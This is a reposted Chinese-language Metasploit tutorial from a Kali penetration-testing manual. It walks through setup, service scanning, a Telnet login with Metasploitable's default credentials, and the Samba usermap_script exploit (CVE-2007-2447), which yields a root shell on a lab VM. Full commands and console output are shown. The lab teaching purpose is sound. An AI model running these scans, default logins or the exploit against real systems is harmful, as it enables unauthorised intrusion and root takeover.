Kali系統 metasploit 使用教程


基礎配置

由於kali 2.0 已經沒有metasploit 這個服務了,所以service metasploit start 的方式不起作用。
在kali 2.0中啟動帶數據庫支持的MSF方式如下:
1 首先啟動postgresql數據庫:
/etc/init.d/postgresql start;或者 service postgresql start;
2 初始化MSF數據庫(關鍵步驟!):msfdb init;(如不能初始化,就用msfdb reinit試試吧!默認創建的數據庫名:msf,msf_test;用戶名:msf;口令默認為空)
3 運行msfconsole:msfconsole;
4 在msf中查看數據庫連接狀態:db_status。
5更新metasploit:msfupdate(我的更新,暫未成功,應該是源的問題!)
6設置啟動 自動啟動msf和postgresql:
update-rc.d postgresql enable
update-rc.d metasploit enable
好了,現在我們來試試,怎么用吧!

在Metasploit中掃描

在Metasploit中,附帶了大量的內置掃描器。使用這些掃描器可以搜索並獲得來自一台計算機或一個完整網絡的服務信息。本節將介紹使用Metasploit中的輔助模塊實現掃描。
【實例4-4】在Metasploit中,掃描目標主機。具體操作步驟如下所示:
(1)啟動MSF終端。執行命令如下所示:
root@kali:~# msfconsole
msf>
(2)搜索所有可用的掃描模塊。執行命令如下所示:
msf > search scanner

Matching Modules

Name Disclosure Date Rank Description
—- ——————– ———– ———————————————
auxiliary/admin/smb/check_dir_file normal SMB Scanner Check File/Directory Utility
auxiliary/bnat/bnat_scan normal BNAT Scanner
auxiliary/gather/citrix_published_applications normal Citrix MetaFrame ICA Published Applications Scanner
auxiliary/gather/enum_dns normal DNS Record Scanner and Enumerator
auxiliary/gather/natpmp_external_address normal NAT-PMP External Address Scanner
auxiliary/gather/windows_deployment_services_shares normal Microsoft Windows Deployment Services Unattend Gatherer
auxiliary/pro/nexpose normal PRO: Nexpose Scanner Integration
auxiliary/pro/webscan normal PRO: Web Application Scanner
auxiliary/scanner/afp/afp_login normal Apple Filing Protocol Login Utility
auxiliary/scanner/afp/afp_server_info normal Apple Filing Protocol Info Enumerator
auxiliary/scanner/backdoor/energizer_duo_detect normal Energizer DUO Trojan Scanner
auxiliary/scanner/chargen/chargen_probe 1996-02-08 normal Chargen Probe Utility
輸出信息顯示了,Metasploit中所有可用的掃描模塊。這些模塊針對各種類型的服務。這里為了縮小查看的范圍,搜索SSH服務的掃描模塊。
(3)掃描SSH服務的掃描模塊。執行命令如下所示:
msf > search scanner/ssh

Matching Modules

Name Disclosure Date Rank Description
—- ————— ———– ——————————————-
auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal Cerberus FTP Server SFTP Username Enumeration
auxiliary/scanner/ssh/ssh_enumusers normal SSH Username Enumeration
auxiliary/scanner/ssh/ssh_identify_pubkeys normal SSH Public Key Acceptance Scanner
auxiliary/scanner/ssh/ssh_login normal SSH Login Check Scanner
auxiliary/scanner/ssh/ssh_login_pubkey normal SSH Public Key Login Scanner
auxiliary/scanner/ssh/ssh_version normal SSH Version Scanner
輸出的信息,顯示了幾個有效的SSH模塊。現在就可以選擇相應的模塊,進行掃描了。
(4)使用ssh_version模塊掃描SSH服務。執行命令如下所示:
msf > use auxiliary/scanner/ssh/ssh_version
(5)查看ssh_version模塊下可配置的選項參數。執行命令如下所示:
msf auxiliary(ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
———— ————— ——– —————————————————————————–
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe
輸出的信息顯示了可配置的模塊。從以上結果中,可以看出RHOSTS選項沒有配置。
(6)配置RHOSTS選項。執行命令如下所示:
msf auxiliary(ssh_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
從輸出的結果中,可以看到RHOSTS(目標主機地址)選項已經設置為192.168.6.105(Metasploit 2操作系統)。
(7)啟動掃描。執行命令如下所示:
msf auxiliary(ssh_version) > exploit
[*] 192.168.6.105:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) >
從輸出的信息中,可以看到目標系統正運行SSH服務,並且版本為SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1。
【實例4-5】掃描MySQL服務器。具體操作步驟如下所示:
(1)登錄MSF終端。執行命令如下所示:
root@kali:~# msfconsole
msf>
(2)使用mysql_version模塊,並查看該模塊中可配置的選項參數。執行命令如下所示:
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > show options
Module options (auxiliary/scanner/mysql/mysql_version):
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
THREADS 1 yes The number of concurrent threads
從輸出的信息中,可以看到RHOSTS選項沒有配置。此時,配置RHOSTS來指定目標主機的地址。
(3)設置RHOSTS選項,並進行MySQL服務掃描。執行命令如下所示:
msf auxiliary(mysql_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
msf auxiliary(mysql_version) > exploit
[*] 192.168.6.105:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
從輸出的結果中,可以看到目標主機上正在運行的MySQL版本是5.0.51a。
【實例4-6】掃描Telnet服務。具體操作步驟如下所示:
(1)啟動MSF終端。執行命令如下所示:
root@kali:~# msfconsole
msf>
(2)使用telnet_version模塊,並查看可配置的選項參數。執行命令如下所示:
msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options
Module options (auxiliary/scanner/telnet/telnet_version):
Name Current Setting Required Description
—- ————— ————— ———————————————————————–
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
RPORT 23 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the Telnet probe
USERNAME no The username to authenticate as
從輸出的信息中,可以看到有四個必須配置選項。其中三個選項已經配置,現在配置RHOSTS選項。
(3)配置RHOSTS選項,並啟動掃描。執行命令如下所示:
msf auxiliary(telnet_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
msf auxiliary(telnet_version) > exploit
[*] 192.168.6.105:23 TELNET _ _ _ _ _ _ _ \x0a _ | | _ _ _ | | _ () | | |_ | | | \ \x0a| ‘_ _ \ / _ \ __/ _ / | ‘_ | |/ _ | | / ` | ‘ | |/ _ \ ) |\x0a| | | | | | / || (| _ \ |) | | () | | || (| | |) | | // / \x0a|| || ||__|____,|/ ./||__/||___,|./||_||\x0a |_| \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
從以上輸出的信息,僅看到一堆文本信息。在這些信息中,沒有關於Telnet服務的版本信息。但是顯示了登錄認證信息,Login with msfadmin/msfadmin to get started。從這條信息中,可以獲取到目標主機Telnet服務的用戶名和密碼。此時可以嘗試登錄。
(4)登錄目標主機的Telnet服務。執行命令如下所示:
root@kali:~# telnet -l msfadmin 192.168.6.105
Trying 192.168.6.105…
Connected to 192.168.6.105.
Escape character is ‘^]’.
Password: #輸入密碼msfadmin
Last login: Tue Jul 8 06:32:46 EDT 2014 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~Telnetmsfadmin@metasploitable: 提示符,則表示成功登錄了Telnet服務。此時可以執行一些標准的Linux命令。例如查看多個組的成員,執行命令如下所示:
msfadmin@metasploitable:~$ id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
輸出信息中顯示了msfadmin用戶的相關信息。其中,gid表示groups中第1個組賬號為該用戶的基本組,groups中的其他組賬號為該用戶的附加組。
在Metasploit中,可以掃描一系列地址。下面以掃描Samba服務器為例,介紹掃描一個網絡內運行的Samba服務器。首先演示下,掃描單個地址的Samba服務器。
【實例4-7】演示目標掃描主機地址為192.168.6.105的Samba服務器。具體操作步驟如下所示:
(1)啟動MSF終端。執行命令如下所示:
root@kali:~# msfconsole
msf>
(2)使用smb_version模塊,並查看該模塊可配置的選項參數。執行命令如下所示:
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
—- ————— ———– ———————————————————————–
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
(3)配置RHOSTS選項。執行命令如下所示:
msf auxiliary(smb_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
(4)啟動掃描。執行命令如下所示:
msf auxiliary(smb_version) > exploit
[*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
從輸出的信息中,可以看到掃描到正在運行的Samba服務器及其版本。
接下來演示掃描192.168.6.0/24網絡內所有運行Sambas服務器的主機。具體操作步驟如下所示:
(1)選擇使用smb_version模塊。執行命令如下所示:
msf > use auxiliary/scanner/smb/smb_version
(2)配置smb_version模塊中可配置的選項參數。執行命令如下所示:
msf auxiliary(smb_version) > set RHOSTS 192.168.6.0/24
RHOSTS => 192.168.6.0/24
msf auxiliary(smb_version) > set THREADS 255
THREADS => 255
(3)啟動掃描。執行命令如下所示:
msf auxiliary(smb_version) > exploit
[*] 192.168.6.106:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:WIN-RKPKQFBLG6C) (domain:WORKGROUP)
[*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] 192.168.6.104:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) (name:LYW) (domain:LYW)
[*] 192.168.6.110:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) (name:AA-886OKJM26FSW) (domain:WORKGROUP)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
從輸出的信息中,可以看到192.168.6.0/24網絡內有四台主機上正在運行着Samba服務器。在顯示的信息中,可以看到運行Samba服務器的操作系統類型。
【實例4-8】滲透攻擊Samba服務器。具體操作步驟如下所示:
(1)啟動MSF終端。執行命令如下所示:
root@kali:~# msfconsole
msf>
(2)搜索usermap模塊。執行命令如下所示:
msf > search samba/usermap

Matching Modules

Name Disclosure Date Rank Description
—- ————— ———– ———————————————–
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba “username map script” Command Execution
從輸出的信息中,可以看到有個usermap模塊。
(3)查看usermap_script模塊的詳細信息。執行命令如下所示:
msf > info exploit/multi/samba/usermap_script
Name: Samba “username map script” Command Execution
Module: exploit/multi/samba/usermap_script
Platform: Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck jduck@metasploit.com
Available targets:
Id Name


0 Automatic
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 139 yes The target port
Payload information:
Space: 1024
Description:
This module exploits a command execution vulerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
“username map script” configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands. No authentication is needed to exploit this vulnerability
since this option is used to map usernames prior to authentication!
References:
http://cvedetails.com/cve/2007-2447/
http://www.osvdb.org/34700
http://www.securityfocus.com/bid/23972
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
http://samba.org/samba/security/CVE-2007-2447.html
輸出的信息顯示了usermap_script模塊的詳細信息。從輸出信息中可以看到,該模塊僅需要配置RHOST選項就可以了。這里不需要加載任何攻擊載荷,就可以自動使用一個Linux命令Shell。
(3)選擇使用usermap_script模塊,並設置RHOST選項。執行命令如下所示:
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.6.105
RHOST => 192.168.6.105
(4)啟動滲透攻擊。執行命令如下所示:
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo IwmN37I0D3cTGJhv;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “IwmN37I0D3cTGJhv\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.6.105:34848) at 2014-07-16 10:00:59 +0800
從輸出的信息中,可以看到成功的打開了一個會話。這表示已成功攻擊了目標主機。此時用戶可以執行一些Linux命令,查看目標主機的相關信息。如下所示:
whoami #查看當前登錄系統的用戶
root
從輸出的信息中,可以看到當前目標系統登錄的用戶名是root。如果想了解該用戶的詳細信息,可以使用id命令查看。如下所示:
id #查看當前登錄用戶的信息
uid=0(root) gid=0(root)
輸出的信息表上root用戶屬於root組,並且其UID和GID都為0。
本文選自:Kail Linux滲透測試實訓手冊大學霸內部資料,轉載請注明出處,尊重技術尊重IT人!
稍有差異,還請指正!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM